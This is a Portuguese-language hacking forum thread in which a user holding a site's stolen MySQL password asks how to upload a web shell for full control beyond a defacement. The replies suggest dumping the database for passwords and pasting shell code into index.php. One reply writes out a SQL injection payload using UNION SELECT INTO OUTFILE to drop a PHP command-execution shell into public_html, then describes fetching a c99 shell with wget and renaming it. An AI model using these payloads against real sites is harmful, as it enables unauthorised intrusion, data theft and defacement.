Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

[Dúvida] Upar shell pelo DB MySQL

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Tempo
  • Show
Clear All
new posts
Anterior template Avançar
  • Font Size
    #1

    [Dúvida] Upar shell pelo DB MySQL

    Salve galera...

    seguinte... tenho a senha dos DB mySQL
    ja tentei upar shell, mais não aceita da erro.
    acredito que seja por que a senha do DB não é a mesmo do CPAINEL

    ate da pra fazer o deface no site pelo DB, mais eu queria UPAR uma Shell para ter controle total.

    alguma sugestão?
    Tags: Nenhum(a)
    • Top
  • Font Size
    #2
    Dê uma olhada nesse tópico : Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    .

    - PHP & VB C0d3r.

    Nickguitar.dll@hotmail.com

    http://www.youtube.com/user/superskate56 <~ Hacking tuts =)

    Quando aprendemos a ouvir, também aprendemos a falar..
    Quando aprendemos a ler, também aprendemos a escrever.
    Então, quando aprendemos a usar um computador, por que não aprender a programa-lo ?

    I'm C0ding for $$$

    #~: Just $this :~#
    • Top

    Comment

    • Font Size
      #3
      Postado Originalmente por Skall Ver Post
      Salve galera...

      seguinte... tenho a senha dos DB mySQL
      ja tentei upar shell, mais não aceita da erro.
      acredito que seja por que a senha do DB não é a mesmo do CPAINEL

      ate da pra fazer o deface no site pelo DB, mais eu queria UPAR uma Shell para ter controle total.

      alguma sugestão?
      Vc tentou upar a shell pelo painel administrativo do site? Digo /adm /admin /login etc..

      Se vc tem a senha do banco de dados basta fazer um Dump dele e vc tem praticamente tudo do site, todas tabelas, senhas, informações.

      Se vc disse que da para fazer deface do site pelo DB e está querendo apenas uma shell no servidor, edita a index.php e cola o código de sua shell e salva, pronto, entra no link dela e upa outra em outro lugar, depois vai denovo no index.php e volta para o código original, pronto vc conseguiu sua shell no servidor sem alterar nada.

      E tem outra questão, com uma shell vc não tem controle de tudo, somente dos arquivos que vc tem permissão para ler e editar, para vc ter um controle total é necessário vc rootar o kernel que está hospedando o site.
      • Top

      Comment

      • Font Size
        #4
        Postado Originalmente por Nickguitar.dll Ver Post
        Dê uma olhada nesse tópico : Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
        como eu disse, da erro.
        aparece a seguinte mensagem ao dumpfile shell

        Código:
        #1045 - Acesso negado para o usuário 'xxxxxxxxx'@'%' (senha usada: SIM)
        • Top

        Comment

        • Font Size
          #5
          Postado Originalmente por Skall Ver Post
          como eu disse, da erro.
          aparece a seguinte mensagem ao dumpfile shell

          Código:
          #1045 - Acesso negado para o usuário 'xxxxxxxxx'@'%' (senha usada: SIM)
          O Site que vc está querendo upar shell é vulneravel a SQL Injection?

          Caso for vc pode usar essa técnica que vou mostrar, que eu particularmente não domino muito ela mas já vi usarem e funciona bem.

          Resumidamente vc vai criar um arquivo via url.

          Primeiro pega os diretórios de onde o site está localizado, a maioria fica em:

          /home/nome_do_site/public_html/

          Feito isso vc vai injetar na url (obs com o número de tabelas de acordo com o site que vc está explorando) e vai colar esse código: /site/index.php?id=1 union select all 1,2,3,"<? $cmd = $_REQUEST["-cmd"]; ?><html><head><title>cmd.php</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>" into outfile "/home/nome_do_site/public_html/nome_do_arquivo.php"

          Altere onde ta escrito nome_do_site e nome_do_arquivo.php

          Vai retornar erro porém vai criar o arquivo com o nome que vc colocou.

          Depois é só acessar o site que está sendo explorado:

          Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

          Após isso para vc subir sua shell vc pega uma shell qualquer na internet que vc acesse via url.. em formato de texto (.txt) mesmo, desta maneira:

          Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (exemplo)

          Ai vc vai no arquivo criado: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

          Escreve: wget Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (Comando para baixar a shell no servidor)

          Depois escreve para mover o formato de .txt para .php, escreve:

          mv c99.txt mv c99.php

          Após isso acessa a url: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
          Essa técnica pode ser usada quando não se encontra uma área para upload no site ou não encontra nenhum setor de administração.

          Espero ter ajudado.
          • Top

          Comment

          Anterior template Avançar
          X
          Working...
          X